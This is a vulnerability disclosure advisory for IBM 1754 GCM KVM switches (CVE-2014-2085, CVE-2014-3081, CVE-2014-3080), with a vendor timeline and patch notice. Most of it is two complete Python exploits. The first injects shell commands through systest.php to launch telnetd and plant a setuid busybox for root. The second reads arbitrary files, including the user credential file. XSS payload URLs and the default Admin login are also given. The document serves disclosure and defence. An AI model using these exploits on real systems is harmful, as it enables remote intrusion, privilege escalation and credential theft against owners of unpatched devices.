IBM 1754 GCM KVM Code Execution / File Read / XSS

` *Product description*  
The IBM 1754 GCM family provides KVM over IP and serial console management  
technology in a single appliance. Versions v1.20.0.22575 and prior are  
vulnerables.  
Note that this vulnerability is also present in some DELL and probably  
other vendors of this rebranded KVM. I contacted Dell but no response has  
been received.  
  
*1. Remote code execution *  
CVEID: CVE-2014-2085  
Description: Improperly sanitized input may allow a remote authenticated  
attacker to perform remote code execution on the GCM KVM switch.  
PoC of this vulnerability:  
  
#!/usr/bin/python"""  
Exploit for Avocent KVM switch v1.20.0.22575.  
Remote code execution with privilege elevation.  
SessionId (avctSessionId) is neccesary for this to work, so you need a  
valid user. Default user is "Admin" with blank password.  
After running exploit, connect using telnet to device with user target  
(pass: target) then do "/tmp/su -" to gain root (password "root")  
[email protected]  
"""  
  
from StringIO import StringIO  
import pycurl  
import os  
  
sessid = "1111111111"  
target = "192.168.0.10"  
  
durl = "https://" + target + "/systest.php?lpres=;%20/usr/  
sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%  
206755%20/tmp/su%20;"  
  
storage = StringIO()  
c = pycurl.Curl()  
c.setopt(c.URL, durl)  
c.setopt(c.SSL_VERIFYPEER,0)  
c.setopt(c.SSL_VERIFYHOST,0)  
c.setopt(c.WRITEFUNCTION,storage.write)  
c.setopt(c.COOKIE,'avctSessionId=' + sessid)  
  
try:  
print "[*] Sending GET to " + target + " with session id " + sessid  
+ "..."  
c.perform()  
c.close()  
except:  
print ""  
finally:  
print "[*] Done"  
print "[*] Trying telnet..."  
print "[*] Login as target/target, then do /tmp/su - and enter password  
\"root\""  
os.system("telnet " + target)  
  
*2. Arbitrary file read *  
CVEID: CVE-2014-3081  
Description: This device allows any authenticated user to read arbitrary  
files. Files can be anywhere on the target.  
  
PoC of this vulnerability:  
  
#!/usr/bin/python  
"""  
This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to  
read arbitrary files on device.  
SessionId (avctSessionId) is neccesary for this to work, so you need a  
valid user.  
[email protected]  
"""  
  
from StringIO import StringIO  
import pycurl  
  
sessid = "1111111111"  
target = "192.168.0.10"  
file = "/etc/IBM_user.dat"  
  
durl = "https://" + target + "/prodtest.php?engage=video_  
bits&display=results&filename=" + file  
  
storage = StringIO()  
c = pycurl.Curl()  
c.setopt(c.URL, durl)  
c.setopt(c.SSL_VERIFYPEER,0)  
c.setopt(c.SSL_VERIFYHOST,0)  
c.setopt(c.WRITEFUNCTION,storage.write)  
c.setopt(c.COOKIE,'avctSessionId=' + sessid)  
  
try:  
c.perform()  
c.close()  
except:  
print ""  
  
content = storage.getvalue()  
print content.replace("<td>","").replace("</td>","")  
  
*3. Cross site scripting non-persistent*  
CVEID: CVE-2014-3080  
Description: System is vulnerable to cross-site scripting, caused by  
improper validation of user-supplied input. A remote attacker could exploit  
this vulnerability using a specially-crafted URL to execute script in a  
victim's Web browser within the security context of the hosting Web site,  
once the URL is clicked. An attacker could use this vulnerability to steal  
the victim's cookie-based authentication credentials.  
  
Examples:  
http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E  
https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E  
  
*Vendor Response:*  
IBM release 1.20.20.23447 firmware  
  
*Timeline:*  
2014-05-20 - Vendor (PSIRT) notified  
2014-05-21 - Vendor assigns internal ID  
2014-07-16 - Patch Disclosed  
2014-07-17 - Vulnerability disclosed  
  
*External Information:*  
Info about the vulnerability (spanish):  
http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html  
IBM Security Bulletin:  
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983  
  
--   
--  
Alejandro Alvarez Bravo  
[email protected]  
  
  
`